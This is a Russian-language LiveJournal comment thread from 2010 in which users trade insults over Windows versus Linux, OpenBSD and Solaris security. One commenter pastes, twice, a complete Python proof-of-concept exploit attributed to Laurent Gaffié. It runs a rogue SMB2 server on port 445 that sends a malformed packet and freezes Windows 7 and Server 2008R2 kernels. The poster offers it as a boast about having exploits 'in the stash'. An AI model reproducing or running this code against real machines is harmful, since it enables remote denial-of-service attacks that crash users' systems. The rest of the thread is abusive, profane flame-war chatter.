ну оно и не открыто:) но сам факт дырки то... тема то о дырках развивалась, и этот shurikh защитник хомячков просил указать ему хоть на одну дырку. но чо та слился быстро. эксплойтов то на примете есть несколько в загашничке на указать хомячку его места, ну чтоб знал кто его барен бгг.
самое забавное наблюдать как хомячки пищат в предвкушении выхода новой вин*, но по выходу жутко плюются и обсирают, юзают и обсирают, юзают и обсирают. хотя я вот не понимаю что в вин* такого нужного и оригинального, что нельзя заменить ( кроме игр, тут да, винду нужно держать ) а остального то софта валом. и на самый крайних случай есть wine.
I. VULNERABILITY ------------------------- Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND ------------------------- #FAIL,#FAIL,#FAIL SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn. #FAIL,#FAIL,#FAIL
III. DESCRIPTION ------------------------- See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT ------------------------- #win7-crash.py: #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent Gaffié #
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41" "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01" "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20" "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e" "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
меньше гораздо, даже больше скажу, их нет. можите проверить и предоставить пруфлинк. например в опенбсд и солярис10:) только не в стороннем совте а именно в системе. ( линуксы не берём так как это дистрибутив сборная солянка ) могу показать где искать , например тут http://www.securityfocus.com а про не заменимость как десктоп ну кому как, вот папа у меня в игры не играет давно, и пользует с удовольствием какойто там из линуксов. кроме популярных иигр там всё есть:)
что такое "сама система"? голое ядро с tcp/ip стеком, или вообще голое ядро? а что такое ядро, когда в него встроены как минимум дрова? и кому оно нужно без всего остального? и я уже перечислял специфичный софт, которого ПРОСТО НЕТ на *nix-ах. Добавлю до кучи Nikon Caprure NX, который нужен для нормальной проявки .NEF файлов. Нормальной, качественной, а не той, которая не видит половину метаданных (я про dcraw и его front-end'ы в курсе, спасибо, кушайте сами).
а что, эта уязвимость где-то массово проявляется, и вызывает волну жалоб енд-юзеров? нет? ой, а нахрена её тогда спешно фиксить, когда куча других критов висит?
вы ещё круто обосрались в каментах вами удалённых:)) про то, что ксорг конф там правили, выж убогенький наверно и не вкурсе что ксорг конф с новой версией иксов просто не нужен, уже давно, с осени наверно. всё само через хал ( если нет сторонних дров )
нет не этот, другие 2. где вы писали про настройку ксорг конф. я не запоминаю.
вы мне кстати предоставите обещаные пруфлинки на критикалуязвимости солярис и опенбсд? или модно ставить на вас клеймо пиздабола и закрывать тему? то что вы попросили, вы получли, от вас пока вообще ничего, кроме какихто понтов нелепых, показухи вашей тупизны и кучи мата. вобщем жду пруфлинки.
no subject
Date: 2010-01-16 10:19 pm (UTC)no subject
Date: 2010-01-17 01:11 am (UTC)no subject
Date: 2010-01-17 01:16 am (UTC)no subject
Date: 2010-01-17 01:21 am (UTC)no subject
Date: 2010-01-17 01:29 am (UTC)no subject
Date: 2010-01-17 01:30 am (UTC)no subject
Date: 2010-01-17 01:36 am (UTC)no subject
Date: 2010-01-17 01:43 am (UTC)хомячковпросил указать ему хоть на одну дырку. но чо та слился быстро. эксплойтов то на примете есть несколько в загашничке на указать хомячку его места, ну чтоб знал кто его барен бгг.no subject
Date: 2010-01-17 01:46 am (UTC)я больше радуюсь с дырявого адобе - это ж надо СТОЛЬКО ужасных дырок выпускать год за годов в своих акробат ридерах и флешах
no subject
Date: 2010-01-17 01:54 am (UTC)хотя я вот не понимаю что в вин* такого нужного и оригинального, что нельзя заменить ( кроме игр, тут да, винду нужно держать ) а остального то софта валом. и на самый крайних случай есть wine.
(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:отвеччаю вам последний...
From:Re: отвеччаю вам последний...
From:вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: отвеччаю вам последний...
From:Re: отвеччаю вам последний...
From:(no subject)
From:no subject
Date: 2010-01-17 01:32 am (UTC)-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL
III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
no subject
Date: 2010-01-17 06:55 am (UTC)no subject
Date: 2010-01-17 10:55 pm (UTC)можите проверить и предоставить пруфлинк. например в опенбсд и солярис10:) только не в стороннем совте а именно в системе. ( линуксы не берём так как это дистрибутив сборная солянка )
могу показать где искать , например тут http://www.securityfocus.com
а про не заменимость как десктоп ну кому как, вот папа у меня в игры не играет давно, и пользует с удовольствием какойто там из линуксов. кроме популярных иигр там всё есть:)
no subject
Date: 2010-01-18 11:02 am (UTC)(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:no subject
Date: 2010-01-17 07:19 am (UTC)no subject
Date: 2010-01-17 01:56 pm (UTC)no subject
Date: 2010-01-17 11:14 pm (UTC)всё таки значит висит куча других помимо бгг
no subject
Date: 2010-01-18 10:53 am (UTC)no subject
Date: 2010-01-18 12:02 pm (UTC)так покажите дырки то?
no subject
Date: 2010-01-18 12:18 pm (UTC)no subject
Date: 2010-01-18 08:45 pm (UTC)no subject
Date: 2010-01-18 08:46 pm (UTC)no subject
Date: 2010-01-18 09:31 pm (UTC)можете ржать начинать, только над собой.
вы же такой глупый.
(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:no subject
Date: 2010-01-18 08:48 pm (UTC)http://community.livejournal.com/useful_faq/10637769.html?thread=106504137#t106504137
этот камент я ЯКОБЫ удалил?
no subject
Date: 2010-01-18 09:34 pm (UTC)вы мне кстати предоставите обещаные пруфлинки на критикалуязвимости солярис и опенбсд? или модно ставить на вас клеймо пиздабола и закрывать тему?
то что вы попросили, вы получли, от вас пока вообще ничего, кроме какихто понтов нелепых, показухи вашей тупизны и кучи мата.
вобщем жду пруфлинки.
(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From: